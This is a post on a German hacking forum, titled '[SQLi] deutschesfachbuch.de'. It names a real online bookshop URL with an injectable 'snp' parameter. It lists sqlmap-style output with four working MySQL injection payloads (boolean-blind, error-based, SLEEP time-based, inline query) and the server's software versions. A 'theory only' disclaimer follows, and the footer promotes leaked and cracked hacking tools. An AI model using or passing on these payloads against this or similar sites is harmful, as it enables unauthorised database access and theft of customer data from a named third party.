Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[SQLi] deutschesfachbuch.de

- - - - -

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
Ch!ller

Ch!ller

    Shinigami

  • SubMod
  • PIPPIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    958
  • 896 Beiträge
  • 1386 Bedankt
  • Spender
  • verifiziert
http://www.deutschesfachbuch.de/UNIX_Das_umfassende_Handbuch_9783836210713.html?snp=5



Parameter: snp (GET)

Type: boolean-based blind

Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)

Payload: snp=5 RLIKE (SELECT (CASE WHEN (5728=5728) THEN 5 ELSE 0x28 END))



Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Payload: snp=5 AND (SELECT 6022 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT (CASE WHEN (6022=6022) THEN 1 ELSE 0 END)),0x7176706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: snp=5 AND SLEEP(5)



Type: inline query

Title: MySQL inline queries

Payload: snp=(SELECT CONCAT(0x716b6a7671,(SELECT (CASE WHEN (8881=8881) THEN 1 ELSE 0 END)),0x7176706b71))

---

web server operating system: Linux Fedora 17 (Beefy)

web application technology: PHP 5.3.20, Apache 2.2.22

back-end DBMS: MySQL 5.0

Alle Angaben und Informationen dienen lediglich der Theorie!

Thanked by 1 Member:
lion.


  Thema Forum Themenstarter Statistik Letzter Beitrag

Dieses Thema wurde von 28 Mitglied(ern) gelesen


    , and6578, ASR, Babo187, bbxhnr, BlackZetsu, Bot4ng, Ch!ller, chick0n, dorich75, eXalT, FakeKeyUser, Framerater, gtek, H2Olli, lion., mdwd, most_uniQue, pdr0, R3s1stanc3, ranjo12, SepaX, Streetboz, syntx, to_da_beat, Toolbase, VeqasZ, Xenio
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.